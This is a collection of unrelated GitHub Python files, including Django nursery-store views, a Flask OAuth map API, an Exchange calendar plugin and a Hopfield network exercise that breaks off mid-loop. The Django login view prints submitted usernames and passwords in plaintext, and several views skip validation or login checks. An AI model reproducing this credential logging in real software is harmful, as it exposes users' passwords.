num=1001, dtype=np.float)\nlogi = np.log(1 + np.exp(-x)) / math.log(2)\nboost = np.exp(-x)\ny_01 = x < 0\ny_hinge = 1.0 - x\ny_hinge[y_hinge < 0] = 0\n\nplt.plot(x, y_01, 'g-', mec='k', label='(0/1损失)0/1 Loss', lw=2)\nplt.plot(x, y_hinge, 'b-', mec='k', label='(合页损失)Hinge Loss', lw=2)\nplt.plot(x, boost, 'm--', mec='k', label='(指数损失)Adaboost Loss', lw=2)\nplt.plot(x, logi, 'r-', mec='k', label='(逻辑斯谛损失)Logistic Loss', lw=2)\nplt.grid(True, ls='--')\nplt.legend(loc='upper right',fontsize=15)\nplt.xlabel('函数间隔:$yf(x)$',fontsize=20)\nplt.title('损失函数',fontsize=20)\nplt.show()\n","repo_name":"mrzhuzhe/pepper","sub_path":"statistical-learning/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"71256680634","text":"# https://stackoverflow.com/questions/34006994/how-to-upload-multiple-images-to-a-blog-post-in-django\n# https://docs.djangoproject.com/en/3.1/topics/forms/formsets/#using-a-formset-in-views-and-templates\n\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse\n\nfrom django.db import transaction\nfrom django.forms import modelformset_factory\nfrom django.contrib.auth.forms import 
AuthenticationForm\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom .forms import CreateUserForm, AddPlantForm, AddPlantImageForm, LoginForm\nfrom .models import Account, Manager, Plant, PlantImage, UserCartPlant, Order\n\n\ndef verify_request(request):\n is_manager = False\n logged_in = False\n user = None\n if request.user is not None:\n user = request.user\n try:\n is_manager = Account.objects.get(email=request.user).is_manager\n logged_in = True\n except:\n logged_in = False\n pass\n\n return {\n \"logged_in\": logged_in,\n \"user\": user,\n \"is_manager\": is_manager,\n }\n\n\ndef home(request):\n plants = Plant.objects.all()\n context = verify_request(request)\n context[\"plants\"] = plants\n return render(request, 'index.html', context)\n\n\ndef signup(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n form = CreateUserForm()\n context[\"form\"] = form\n return render(request, 'signup.html', context)\n\n\ndef signup_as_manager(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n form = CreateUserForm()\n context[\"form\"] = form\n return render(request, 'signup-as-manager.html', context)\n\n\ndef create_account(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n form = CreateUserForm(request.POST)\n form.save()\n return redirect('login')\n\n\n@transaction.atomic\ndef create_manager(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n form = CreateUserForm(request.POST)\n Manager(account=Account.objects.get(email=form.save())).save()\n # print(form.save(), form.cleaned_data.get('email'))\n return redirect('login')\n\n\ndef account_login(request):\n context = verify_request(request)\n if context[\"logged_in\"]:\n return redirect('home')\n\n if request.method == 'POST':\n form = LoginForm(request.POST)\n username = request.POST['username']\n password = request.POST['password']\n print(username, password)\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('home')\n form = LoginForm()\n context[\"form\"] = form\n return render(request, 'login.html', context)\n\n\n@transaction.atomic\ndef add_plant_to_db(request, ImageFormset):\n plant_form = AddPlantForm(request.POST)\n image_formset = ImageFormset(request.POST, request.FILES)\n if plant_form.is_valid() and image_formset.is_valid():\n plant = Plant(\n name=request.POST['name'],\n description=request.POST['description'],\n price=request.POST['price'],\n manager=Manager(account=Account.objects.get(email=request.user))\n )\n plant.save()\n for form in image_formset.cleaned_data:\n if form and form['image']:\n PlantImage(image=form['image'], plant=plant).save()\n else:\n raise ValueError(\"Validation Error!\")\n\n\n@login_required(login_url='/login/')\ndef add_plant(request):\n context = verify_request(request)\n form = AddPlantForm()\n ImageFormset = modelformset_factory(\n PlantImage, form=AddPlantImageForm, extra=4, exclude=('plant',))\n\n if request.method == \"POST\":\n add_plant_to_db(request, ImageFormset)\n return redirect('home')\n\n image_formset = ImageFormset(queryset=PlantImage.objects.none())\n context[\"form\"] = form\n context[\"image_formset\"] = image_formset\n\n return 
render(request, 'add-plant.html', {\"form\": form, \"image_formset\": image_formset})\n\n\ndef account_logout(request):\n logout(request)\n return redirect('home')\n\n\ndef add_to_cart(request):\n plant_id = request.GET.get('plantId')\n account = Account.objects.get(\n email=request.user)\n plant = Plant.objects.get(id=plant_id)\n try:\n user_cart_plant = UserCartPlant.objects.get(\n account=account, plant=plant)\n user_cart_plant.quantity = user_cart_plant.quantity+1\n user_cart_plant.save()\n except:\n UserCartPlant(account=account, plant=plant).save()\n return JsonResponse({'success': True})\n\n\n@login_required(login_url='/login/')\ndef cart(request):\n context = verify_request(request)\n user_cart_plant = UserCartPlant.objects.filter(\n account=Account.objects.get(email=request.user))\n context[\"user_cart\"] = user_cart_plant\n return render(request, 'cart.html', context)\n\n\n@login_required(login_url='/login/')\ndef place_order(request):\n context = verify_request(request)\n cart = UserCartPlant.objects.filter(\n account=Account.objects.get(email=request.user))\n for plant in cart:\n Order(plant=plant.plant, account=plant.account,\n quantity=plant.quantity, manager=plant.plant.manager).save()\n plant.delete()\n return redirect('cart')\n\n\n@login_required(login_url='/login/')\ndef received_orders(request):\n context = verify_request(request)\n orders = Order.objects.filter(\n manager=Manager.objects.get(\n account=Account.objects.get(email=request.user)))\n context[\"orders\"] = orders\n return render(request, 'received-orders.html', context)\n\n\n@login_required(login_url='/login/')\ndef dispatch_orders(request):\n context = verify_request(request)\n orders = Order.objects.filter(\n manager=Manager.objects.get(\n account=Account.objects.get(email=request.user)))\n for order in orders:\n order.delete()\n return redirect('received-orders')\n","repo_name":"akverma26/Online-Nursery-Store","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"24089463595","text":"import os, socket, time\nos.environ['MASTER_ADDR'] = 'localhost'\nos.environ['MASTER_PORT'] = '8818'\n\nimport torch\nimport torch.distributed.rpc as rpc\nfrom torch.multiprocessing import Lock\nfrom virtual_rodent.utils import save_checkpoint\nfrom .base import SampleQueue\n\nimport importlib.util\nspec = importlib.util.spec_from_file_location('_', os.environ['model_init_method_path'])\nscript = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(script)\nmodel_init_method = script.model_init_method\n\ntarget_model, behavior_model = None, None\nlock_target, lock_behavior = Lock(), Lock()\n\nsample_queue = None\n\ntraining_stats_keys = ('total_loss', 'mean_vtrace', 'mean_value', \n 'actor_loss', 'critic_loss', 'entropy', 'learning_rate')\ntraining_stats = {k: [] for k in training_stats_keys}\nreward_stats = dict()\nlock_training_stats, lock_reward_stats = Lock(), Lock()\n\ndef store_batch(worker_id, env_name, batch):\n sample_queue.put(worker_id - 1, batch)\n reward = batch['reward'].detach().cpu().sum().item()\n with lock_reward_stats:\n try:\n reward_stats[env_name].append(reward)\n except KeyError:\n reward_stats[env_name] = [reward]\n\ndef fetch_batch(batch_size):\n while len(sample_queue) < batch_size: # Get enough samples first\n time.sleep(0.1)\n return sample_queue.sample(batch_size)\n\ndef record_loss(loss_dict):\n with lock_training_stats:\n for k, v in 
loss_dict.items():\n training_stats[k] += list(v)\n\ndef get_target_model():\n global target_model\n with lock_target:\n if target_model is None: \n target_model = model_init_method()\n return target_model\n\ndef save(save_dir):\n save_checkpoint(target_model.state_dict(), None, os.path.join(save_dir, 'model.pt'))\n with open(os.path.join(save_dir, 'training_stats.pkl'), 'wb') as f:\n pickle.dump(training_stats, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(os.path.join(save_dir, 'rewards.pkl'), 'wb') as f:\n pickle.dump(reward_stats, f, protocol=pickle.HIGHEST_PROTOCOL)\n\ndef get_behavior_model():\n global behavior_model\n with lock_behavior:\n if behavior_model is None:\n behavior_model = model_init_method()\n return behavior_model\n\ndef param_rref(model):\n return [rpc.RRef(param) for param in model.parameters()]\n\ndef forward(model, *args, **kwargs):\n return model(*args, **kwargs)\n\ndef _call_method(method, rref, *args, **kwargs):\n return method(rref.local_value(), *args, **kwargs)\n\ndef remote_method(method, rref, *args, **kwargs):\n args = [method, rref] + list(args)\n return rpc.rpc_sync(rref.owner(), _call_method, args=args, kwargs=kwargs)\n\ndef run_parameter_server(rank, world_size, exit, exit_value, save_dir, n_workers, \n max_step, vision_dim, propri_dim, action_dim):\n os.environ['MASTER_ADDR'] = socket.gethostbyname(socket.gethostname())\n os.environ['MASTER_PORT'] = '8818'\n print('ps', os.environ['MASTER_ADDR'])\n rpc.init_rpc(name='ParameterServer', rank=rank, world_size=world_size)\n print('ps', os.environ['MASTER_ADDR'])\n global sample_queue\n sample_queue = SampleQueue(1000, n_workers, max_step,\n vision_dim, propri_dim, action_dim) \n print(\"RPC initialized! Running parameter server...\")\n while exit.value != exit_value:\n time.sleep(20)\n if target_model is not None and behavior_model is not None:\n behavior_model.load_state_dict(target_model.state_dict())\n save(save_dir)\n rpc.shutdown()\n print(\"RPC shutdown on parameter server.\")\n","repo_name":"gongziyida/virtual-rodent","sub_path":"virtual_rodent/IMPALA/distributed/ParameterServer.py","file_name":"ParameterServer.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14894540692","text":"# Binary search\r\n# Find arr number index \r\n\r\ndef first_arr_value(arr, target):\r\n left = 0\r\n right = len(arr) - 1\r\n\r\n while left <= right:\r\n mid = left + (right - left)//2\r\n if arr[mid] == target:\r\n return mid\r\n if arr[mid] < target:\r\n left = mid + 1\r\n else:\r\n right = mid - 1\r\n return None\r\n\r\nprint (first_arr_value([2,3,5,6,8,10,12], 8))\r\nprint (first_arr_value([2,3,5,6,8,10,12,500,658,999], 9))","repo_name":"ArnasKundrotas/algos-python","sub_path":"binary-search-find-index.py","file_name":"binary-search-find-index.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35523564217","text":"\"\"\"\nRecurse World back-end\n\"\"\"\n\nfrom functools import wraps\nimport logging\nimport os\nfrom flask import (\n Flask, jsonify, redirect, request, send_from_directory, session, url_for\n)\nfrom authlib.flask.client import OAuth\nfrom werkzeug.exceptions import HTTPException\nimport psycopg2\nimport sys\nfrom dotenv import load_dotenv\nimport geojson\n\n\nload_dotenv()\n\n\ndef getEnvVar(var_name, fallback=\"\"):\n value = os.getenv(var_name) or fallback\n if not value:\n logging.error(\n 
f'\"{var_name}\" value not found.'\n ' Ensure a .env file is present'\n ' with this environment variable set.'\n )\n sys.exit()\n\n logging.info(var_name + \": \" + value)\n return value\n\n\n# pylint: disable=invalid-name\napp = Flask(__name__)\napp.secret_key = getEnvVar('FLASK_SECRET_KEY', 'development')\n\nlogging.basicConfig(level=logging.INFO)\n\nrc = OAuth(app).register(\n 'Recurse Center',\n api_base_url='https://www.recurse.com/api/v1/',\n authorize_url='https://www.recurse.com/oauth/authorize',\n access_token_url='https://www.recurse.com/oauth/token',\n client_id=getEnvVar('CLIENT_ID'),\n client_secret=getEnvVar('CLIENT_SECRET'),\n)\n\nconnection = psycopg2.connect(getEnvVar('DATABASE_URL'))\n\n\n@app.route('/')\ndef index():\n \"Get the single-page app HTML\"\n return send_from_directory('build', 'index.html')\n\n\n@app.route('/<path:path>')\ndef static_file(path):\n \"Get the single-page app assets\"\n return send_from_directory('build', path)\n\n\n@app.route('/auth/recurse')\ndef auth_recurse_redirect():\n \"Redirect to the Recurse Center OAuth2 endpoint\"\n callback = getEnvVar('CLIENT_CALLBACK')\n return rc.authorize_redirect(callback)\n\n\n@app.route('/auth/recurse/callback', methods=['GET', 'POST'])\ndef auth_recurse_callback():\n \"Process the results of a successful OAuth2 authentication\"\n\n try:\n token = rc.authorize_access_token()\n except HTTPException as e:\n logging.error(\n 'Error %s parsing OAuth2 response: %s',\n request.args.get('error', '(no error code)'),\n request.args.get('error_description', '(no error description'),\n )\n return (jsonify({\n 'message': 'Access Denied',\n 'error': request.args.get('error', '(no error code)'),\n 'error_description': request.args.get('error_description',\n '(no error description)'),\n }), 403)\n\n me = rc.get('profiles/me', token=token).json()\n logging.info(\"Logged in: %s\", me.get('name', ''))\n\n session['recurse_user_id'] = me['id']\n return redirect(url_for('index'))\n\n\ndef needs_authorization(route):\n \"\"\" Use the @needs_authorization annotation to check that a valid session\n exists for the current user.\"\"\"\n @wraps(route)\n def wrapped_route(*args, **kwargs):\n \"\"\"Check the session, or return access denied.\"\"\"\n if app.debug:\n return route(*args, **kwargs)\n elif 'recurse_user_id' in session:\n return route(*args, **kwargs)\n else:\n return (jsonify({\n 'message': 'Access Denied',\n }), 403)\n\n return wrapped_route\n\n\n@app.route('/api/geo.json')\n@needs_authorization\ndef get_locations():\n cursor = connection.cursor()\n cursor.execute(\"\"\"\n SELECT p.name AS name,\n p.image_url,\n p.directory_url,\n l.name AS location_name,\n l.longitude,\n l.latitude\n FROM profiles AS p\n INNER JOIN locations AS l\n on p.location = l.name\n ORDER BY p.profile_id ASC\n \"\"\")\n\n people = cursor.fetchall()\n cursor.close()\n\n return jsonify(\n geojson.FeatureCollection([\n geojson.Feature(\n geometry=geojson.Point((float(person[4]), float(person[5]))),\n properties={\n 'name': person[0],\n 'image_url': person[1],\n 'directory_url': person[2],\n 'location_name': person[3]\n },\n )\n for person in people\n ])\n )\n","repo_name":"jasonaowen/recurse-world","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12569853322","text":"import aspose.pdf as ap\n\ndocument = ap.Document(\"input2.pdf\")\n\n \n\n# Instantiate a TextFragmentAbsorber object\n\ntxtAbsorber = 
ap.text.TextFragmentAbsorber(\"Tengiz\")\n\n \n\n# Search text\n\ndocument.pages.accept(txtAbsorber)\n\n \n\n# Get reference to the found text fragments\n\ntextFragmentCollection = txtAbsorber.text_fragments\n\nfor frag in textFragmentCollection:\n\n print(frag.text)\n\n# Parse all the searched text fragments and replace text\n\nfor txtFragment in textFragmentCollection:\n\n txtFragment.text = \"that\"\n\n \n\n# Save the updated PDF\n\ndocument.save(\"output.pdf\")","repo_name":"Nikhilranjan7352/newdemo","sub_path":"myapps/pythonScripts/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"585058662","text":"\"\"\"\nExchange calendar integration.\n\"\"\"\n\nimport datetime as dt\nfrom collections import namedtuple\n\nfrom orgassist import log\nfrom orgassist.assistant import Assistant, AssistantPlugin\nfrom orgassist.config import ConfigError\n\nfrom orgassist.calendar import Event\nfrom orgassist.calendar import EventDate, DateType\n\nAttendee = namedtuple('Attendee', 'name, email, required')\n\n@Assistant.plugin('exch')\nclass ExchPlugin(AssistantPlugin):\n \"\"\"\n Exchange calendar integration. Reads events for today and in the given\n horizon and feeds them into the calendar core plugin.\n\n Will handle notifications and todays agenda display.\n \"\"\"\n\n def validate_config(self):\n \"Get all config values and test optional module existence.\"\n # Load optional modules only when module is configured.\n # Test here early that they exists.\n try:\n # pylint: disable=unused-variable\n from pyexchange import Exchange2010Service\n from pyexchange import ExchangeNTLMAuthConnection\n except ImportError:\n msg = (\"Exchange Plugin requires an optional pyexchange module. 
\"\n \"Install it with pip3 install pyexchange.\")\n raise ConfigError(msg)\n\n self.username = self.config.get('username', assert_type=str)\n self.password = self.config.get('password', assert_type=str)\n self.url = self.config.get('url', assert_type=str)\n self.ca_path = self.config.get_path('ca_path', required=False)\n\n self.horizon_incoming = self.config.get('horizon_incoming',\n default=24,\n assert_type=int)\n\n self.my_email = self.config.get('my_email', default='',\n assert_type=str)\n\n def register(self):\n \"Register commands\"\n commands = [\n (['exch.refresh'], self.handle_refresh),\n ]\n for aliases, callback in commands:\n self.assistant.command.register(aliases, callback)\n\n def initialize(self):\n \"\"\"\n Initialize connection and schedule periodic events.\n \"\"\"\n # Loading optional modules only when module is configured.\n from pyexchange import Exchange2010Service\n from pyexchange import ExchangeNTLMAuthConnection\n\n self.connection = ExchangeNTLMAuthConnection(url=self.url,\n username=self.username,\n password=self.password)\n self.service = Exchange2010Service(self.connection)\n self.exch_calendar = self.service.calendar()\n self.connection.build_session()\n\n if self.ca_path is not None:\n self.connection.session.verify = self.ca_path\n\n # Initial refresh\n self.refresh_events()\n self.scheduler.every(60 * 10).seconds.do(self.refresh_events)\n\n def handle_refresh(self, message):\n \"Handle force-refreshing and return stats on events\"\n events = self.refresh_events()\n reply = \"Read %d events from your calendar.\" % (len(events))\n message.respond(reply)\n\n def convert_event(self, exch_event):\n \"Convert Exchange event to orgassist calendar event\"\n # Drop external objects, gather all required data.\n # Don't leak abstraction.\n ctx = {\n 'subject': exch_event.subject,\n 'text_body': exch_event.text_body,\n 'location': exch_event.location,\n 'date_start': self.time.normalize(exch_event.start),\n 'date_end': self.time.normalize(exch_event.end),\n 'date_all_day': exch_event.is_all_day,\n\n 'organizer': Attendee(name=exch_event.organizer.name,\n email=exch_event.organizer.email,\n required=True) if exch_event.organizer else None,\n 'attendees': [\n Attendee(name=a.name,\n email=a.email,\n required=a.required)\n for a in exch_event.attendees\n if a is not None\n ],\n\n 'your_meeting': False,\n 'you_required': False,\n }\n\n # Safely determine organizer\n if ctx['organizer'] is None:\n ctx['organizer'] = Attendee(name='unknown',\n email='none',\n required=True)\n\n if ctx['organizer'].email == self.my_email:\n ctx['your_meeting'] = True\n\n myself = [\n a\n for a in ctx['attendees']\n if a.email == self.my_email\n ]\n\n if myself and myself[0].required:\n ctx['you_required'] = True\n\n # Context ready - construct our event\n parts = []\n if ctx['location']:\n parts.append('[' + ctx['location'] + ']')\n\n priority = 'C'\n if ctx['your_meeting']:\n parts.append('Your meeting')\n priority = 'A'\n elif ctx['you_required']:\n parts.append(\"Required by %s for\" % ctx['organizer'].name)\n priority = 'B'\n elif not ctx['you_required']:\n parts.append(\"Informed by %s about\" % ctx['organizer'].name)\n\n parts.append('\"' + ctx['subject'] + '\"')\n parts.append(\"(%d attending)\" % len(ctx['attendees']))\n\n headline = \" \".join(parts)\n\n event = Event(headline)\n event.priority = priority\n\n event.body = ctx['text_body']\n event.meta['exch'] = ctx\n\n date = EventDate((ctx['date_start'], ctx['date_end']),\n DateType.RANGE)\n event.add_date(date)\n\n return 
event\n\n def refresh_events(self):\n \"\"\"\n Read events from exchange, convert and update calendar.\n \"\"\"\n log.info(\"Periodic operation executed\")\n\n now = self.time.now()\n\n start_of_day = now.replace(hour=0, minute=0)\n horizon_end = now + dt.timedelta(hours=self.horizon_incoming)\n\n try:\n events = self.exch_calendar.list_events(\n start=start_of_day,\n end=horizon_end,\n details=True\n )\n except AttributeError:\n # Module is badly written. In case of connection errors it\n # throws Attribute Error. Show error in case something weird\n # happened, but don't kill bot.\n log.exception(\"Connection (probably) error within exch module.\")\n return None\n\n calendar_events = []\n for event in events.events:\n converted = self.convert_event(event)\n calendar_events.append(converted)\n\n log.info('Read %d events from exchange',\n len(calendar_events))\n\n # Use shared state to talk to core plugins\n self.state['calendar'].update_events(calendar_events, 'exch')\n return calendar_events\n","repo_name":"blaa/orgassist","sub_path":"orgassist/plugins/exch/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"95"} +{"seq_id":"4038348927","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 2 10:03:19 2021\n\n@author: cjrichier\n\"\"\"\n\n#import libraries\nimport random, math\nimport pandas as pd\n\n######## Initialize connection class ########\nclass Connection(object):\n def __init__(self, recipient, sender, weight = 0):\n self.owner = recipient #set connection to have the unit connect to another unit\n self.sender = sender #set who is sending the connection \n self.weight = weight #initialize the weight \n def update_weight(self): #update the weight of this connection \n #implementation of hopfield learning algorithim\n print('* * * * * * * * * * * * *')\n self.weight += (2 * self.owner.activation - 1) * (2 * self.sender.activation - 1)\n print('updated unit weight: ', self.weight)\n \n######## Initialize unit class ########\nclass HopUnit(object):\n def __init__(self, my_list, threshold=0):\n self.index = len(my_list) # give the unit an index \n self.threshold = threshold #set the threshold\n self.net_input = 0 #initialize net input to 0\n self.target_activation = 0\n self.connections = [] \n self.activation = 0 #initialize activation to 0 #create an argument for which activation function to use when initializing the neuron\n def add_connection(self, sender, weight=0):\n self.connections.append(Connection(self, sender, weight)) #create connections\n def update_input(self):\n self.net_input = 0\n for connection in self.connections:\n self.net_input += connection.weight * connection.sender.activation\n return self.net_input\n def update_target_activation(self):\n #most basic activation function\n \n if self.net_input > self.threshold:\n self.target_activation = 1\n else:\n self.target_activation = 0\n return self.net_input\n \n def display_value(self):\n if self.activation == self.target_activation:\n return ' '+str(self.activation)\n else:\n if self.activation == 1:\n return ' i'\n else:\n return ' o'\n \n def settled(self):\n if self.activation == self.target_activation:\n return True\n else:\n return False\n def update_activation(self): \n self.activation = self.target_activation\n def show(self):\n print('************************************')\n print ('\\nUnit '+str(self.index)+':')\n print ('\\tInput = '+str(self.net_input))\n print 
('\\tTarget activation = '+str(self.target_activation))\n print ('\\tCurrent Activation = '+str(self.activation))\n print ('\\tHas connections from...')\n for connection in self.connections:\n print('\\t Unit '+str(connection.sender.index)+' = '+str(connection.weight))\n\n######## Initialize network class ########\nclass network(object):\n def __init__(self, num_units, default_threshold =0):\n self.units = []\n units = []\n for i in range(num_units):\n self.units.append(HopUnit(self.units, default_threshold))\n # and connect them\n for unit_i in self.units:\n for unit_j in self.units:\n if not unit_i is unit_j:\n unit_i.add_connection(unit_j)\n def all_units_have_settled(self):\n for unit in self.units:\n if unit.settled() == False:\n return False \n return True\n #This function is not working at all, gives an indexing error \n def make_starting_state(self, training_pattern, noise):\n #adds noise to training pattern to hand to network as starting state\n starting_state = []\n for i in range(len(training_pattern)):\n if random.random() < noise:\n #flip the number in training pattern \n if training_pattern[i] == 1:\n starting_state.append(0)\n else:\n starting_state.append(1) \n else:\n starting_state.append(training_pattern[i])\n return starting_state\n def train_patterns(self, training_pattern):\n #impose the training pattern on the network\n for i in range(len(training_pattern)):\n self.units[i].activation = training_pattern[i]\n print(self.units[i].activation)\n for unit in self.units:\n for connection in unit.connections:\n connection.update_weight()\n #return self\n def run_network(self, starting_state, training_pattern, sync_update=False):\n print('************************************')\n print('Running network with starting activation: ', str(starting_state))\n print('Trying to reconstruct: ', str(training_pattern))\n print('************************************')\n list_of_units_to_update = []\n for unit in self.units:\n list_of_units_to_update.append(unit) \n for i in range(len(starting_state)):\n self.units[i].activation = starting_state[i]\n iteration = 0\n all_done = False\n while not (all_done or iteration > 49):\n iteration += 1\n print('Iteration' , str(iteration), 'diagnostics and tracking:')\n ########################\n if sync_update == False:\n ########################\n for unit in self.units:\n #update net input and print details\n unit.update_input()\n unit.update_target_activation()\n #update target activations\n unit_TAs = []\n for unit in self.units:\n unit_TAs.append(unit.target_activation)\n #check for settling\n settled = self.all_units_have_settled()\n print('The network is settled? 
', settled)\n print('Target activations: ', unit_TAs)\n if settled == False:\n #randomly choose one unit and update actual activation\n random_unit_to_update = random.choice(list_of_units_to_update)\n for unit in self.units:\n if unit.index == random_unit_to_update.index:\n unit.activation = unit.target_activation\n iteration_activation = []\n for unit in self.units:\n iteration_activation.append(unit.activation)\n print('unit randomly updated: ', random_unit_to_update.index)\n print('Updated activations: ', iteration_activation)\n iteration_energy = self.compute_energy()\n print('This iteration has energy ' + str(iteration_energy))\n print('************************************')\n elif settled == True:\n iteration_activation = []\n for unit in self.units:\n iteration_activation.append(unit.activation)\n all_done = True \n #######################\n if sync_update == True:\n #######################\n unit_start = []\n for unit in self.units:\n unit.update_input()\n unit_start.append(unit.update_input()) \n print(unit_start) \n for unit in self.units:\n unit.update_target_activation()\n #update net input and print details\n #inputs.append(unit.update_input())\n #print('updated input: ', inputs)\n #inputs = []\n #for unit in self.units:\n #inputs.append(unit.update_target_activation())\n #print('inputs as seen by target activations: ', inputs)\n #update activations\n for unit in self.units:\n unit.activation = unit.target_activation\n #check for settling\n \n settled = self.all_units_have_settled()\n print('The network is settled? ', settled)\n if settled == False:\n iteration_activation = []\n for unit in self.units:\n iteration_activation.append(unit.activation)\n print('Updated activations: ', iteration_activation)\n iteration_energy = self.compute_energy()\n print('This iteration has energy ' + str(iteration_energy))\n print('************************************')\n elif settled == True:\n iteration_activation = []\n for unit in self.units:\n iteration_activation.append(unit.activation)\n all_done = True \n \n final_activation = iteration_activation \n #now, calculate print some summary metrics\n #Keep track of the training state\n hamming_distance = self.hamming_distance(training_pattern, final_activation)\n energy = self.compute_energy()\n print('************************************')\n print('Training pattern to recover: ', str(training_pattern))\n print('Final network activation: ', str(final_activation))\n print('************************************')\n print('After running, the hamming distance between patterns this network ran on is ' + str(hamming_distance))\n if hamming_distance == 0:\n print('Congrats! 
The network rebuilt the pattern.')\n else:\n print('A bit off the mark there, bucko.')\n print('The energy of this network in its final iteration is ' + str(energy))\n if iteration > 20:\n print('This network failed to settle and ran for the maximum number of alloted iterations: ' + str(iteration))\n else:\n print('The Network ran for ' + str(iteration)+' iterations before it settled.')\n print('End of network run.')\n print('************************************')\n return(hamming_distance, energy, iteration)\n def compute_energy(self):\n # E = -1/2 (*sum (over weights, i,j, of a[i] *w[i,j]))\n energy = 0.0\n for unit in self.units:\n for connection in unit.connections:\n energy += connection.weight * connection.sender.activation * connection.owner.activation\n return -.5 * energy\n def hamming_distance(self, pattern1, pattern2):\n distance = 0\n for i in range(len(pattern1)):\n if pattern1[i] != pattern2[i]:\n distance +=1\n return distance\n\n####### Part 1 #######\n\n#initialize network\nHop_network = network(16) \n\n## part a)\n# Train the pattern on the walsh functions:\ntraining_pattern_1 = [1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0]\ntraining_pattern_2 = [1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0]\ntraining_pattern_3 = [1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,0]\ntraining_pattern_4 = [1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0]\nlist_of_training_patterns = [training_pattern_1, training_pattern_2, \n training_pattern_3, training_pattern_4]\n\n#Train the network on those walsh functions:\nHop_network.train_patterns(training_pattern_1) \nHop_network.train_patterns(training_pattern_2)\nHop_network.train_patterns(training_pattern_3)\nHop_network.train_patterns(training_pattern_4)\n\n#Part b)\n#run the network\nlist_0_runs = []\nlist_1_runs = []\nlist_2_runs = []\nlist_3_runs = []\nlist_4_runs = []\nlist_5_runs = []\nfor training_pattern in list_of_training_patterns:\n for noise_level in (0,.1,.2,.3,.4,.5): \n for run_index in range(5):\n start_pattern = Hop_network.make_starting_state(training_pattern, noise_level)\n #list_of_runs_output.append(Hop_network.run_network(start_pattern, training_pattern))\n if noise_level == 0:\n list_0_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .1:\n list_1_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .2:\n list_2_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .3:\n list_3_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .4:\n list_4_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .5:\n list_5_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n \n \n#Get summary statistics\n\nlist_0_runs = pd.DataFrame(list_0_runs)\nlist_1_runs = pd.DataFrame(list_1_runs)\nlist_2_runs = pd.DataFrame(list_2_runs)\nlist_3_runs = pd.DataFrame(list_3_runs)\nlist_4_runs = pd.DataFrame(list_4_runs)\nlist_5_runs = pd.DataFrame(list_5_runs)\n#############\nlist_0_runs = list_0_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_1_runs = list_1_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_2_runs = list_2_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_3_runs = list_3_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_4_runs = list_4_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# 
Iterations\"})\nlist_5_runs = list_5_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\n\npart_1b_summary_stats = [list_0_runs, list_1_runs, list_2_runs, \n list_3_runs ,list_4_runs, list_5_runs]\n\n#Print out the summary stats:\ncount = 0\nfor df in part_1b_summary_stats:\n print('* * * * * * * * * * * * * * * * * * * *')\n print('For noise value', str(count), ':')\n print('Number of times network failed to settle: ', df.loc[df['# Iterations'] == 50, '# Iterations'].count())\n print(\"Average energy: \", df['Energy'].mean())\n print(\"Average hamming Distance: \", df['Hamming Distance'].mean())\n count += .1\n\n'''The network , with increasing error values in the starting pattern, had growing \nhamming distance and times it failed to settle. The energy also increased with each increasing\nvalue of noise. In fact, when error is 0, it always can recreate the initial pattern.'''\n\n\n############ Part 2 ###########\n####### Random Patterns #######\n###############################\n\n#initialize network\nHop_network = network(16) \n\n#Part 2A\n#Create three random training patterns. In each training pattern activate each unit with probability 0.5.\nlist_of_random_training_patterns = []\nrandom_pattern_1 = []\nfor i in range(15):\n n = random.randint(0,1)\n random_pattern_1.append(n)\nrandom_pattern_2 = []\nfor i in range(15):\n n = random.randint(0,1)\n random_pattern_2.append(n)\nrandom_pattern_3 = []\nfor i in 